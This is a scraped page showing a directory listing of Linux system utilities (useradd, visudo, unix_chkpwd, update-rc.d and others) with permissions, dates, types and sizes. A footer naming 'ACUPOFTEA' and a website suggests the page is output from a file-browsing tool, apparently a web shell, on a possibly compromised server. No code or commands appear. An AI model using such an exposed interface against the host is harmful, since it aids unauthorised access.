-rwxr-xr-x
2024-09-18 05:25:15
telinit
application/x-pie-executable
290.92 KB
-rwxr-xr-x
2026-04-13 07:38:05
tipc
application/x-pie-executable
170.67 KB
-rwxr-xr-x
2025-05-26 11:16:26
traceroute
application/x-pie-executable
75.3 KB
-rwxr-xr-x
2024-09-18 05:25:15
tune2fs
application/x-pie-executable
118.52 KB
-rwxr-xr-x
2026-05-09 11:36:41
unix_chkpwd
application/x-pie-executable
42.24 KB
-rwxr-sr-x
2025-06-29 05:40:46
unix_update
application/x-pie-executable
42.24 KB
-rwxr-xr-x
2025-06-29 05:40:46
update-ca-certificates
text/x-shellscript
5.54 KB
-rwxr-xr-x
2025-04-19 07:25:37
update-fonts-alias
text/x-shellscript
5.71 KB
-rwxr-xr-x
2024-04-18 12:50:02
update-fonts-dir
text/x-shellscript
3.98 KB
-rwxr-xr-x
2024-04-18 12:50:02
update-fonts-scale
text/x-shellscript
6.1 KB
-rwxr-xr-x
2024-04-18 12:50:02
update-gsfontmap
text/x-shellscript
390 B
-rwxr-xr-x
2025-10-05 07:09:15
update-locale
text/x-perl
3.02 KB
-rwxr-xr-x
2026-04-27 08:09:22
update-mime
text/x-perl
9.83 KB
-rwxr-xr-x
2024-11-11 11:56:25
update-passwd
application/x-pie-executable
38.49 KB
-rwxr-xr-x
2025-03-23 03:30:08
update-rc.d
text/x-perl
17.72 KB
-rwxr-xr-x
2023-11-24 12:34:19
update-shells
text/x-shellscript
3.97 KB
-rwxr-xr-x
2025-07-27 11:01:22
useradd
application/x-pie-executable
155.9 KB
-rwxr-xr-x
2025-04-19 10:20:28
userdel
application/x-pie-executable
111.06 KB
-rwxr-xr-x
2025-04-19 10:20:28
usermod
application/x-pie-executable
143.74 KB
-rwxr-xr-x
2025-04-19 10:20:28
validlocale
text/x-perl
1.73 KB
-rwxr-xr-x
2026-04-27 08:09:22
vdpa
application/x-pie-executable
122.73 KB
-rwxr-xr-x
2025-05-26 11:16:26
vigr
application/x-pie-executable
72.77 KB
-rwxr-xr-x
2025-04-19 10:20:28
vipw
application/x-pie-executable
72.77 KB
-rwxr-xr-x
2025-04-19 10:20:28
visudo
application/x-pie-executable
284.8 KB
-rwxr-xr-x
2026-04-11 12:21:02
vpddecode
application/x-pie-executable
14.51 KB
-rwxr-xr-x
2024-11-15 05:41:58
wipefs
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2025-05-09 10:54:07
zic
application/x-pie-executable
62.32 KB
-rwxr-xr-x
2026-04-27 08:09:22
zramctl
application/x-pie-executable
134.51 KB
-rwxr-xr-x
2025-05-09 10:54:07
~ ACUPOFTEA - stevesummers.com.au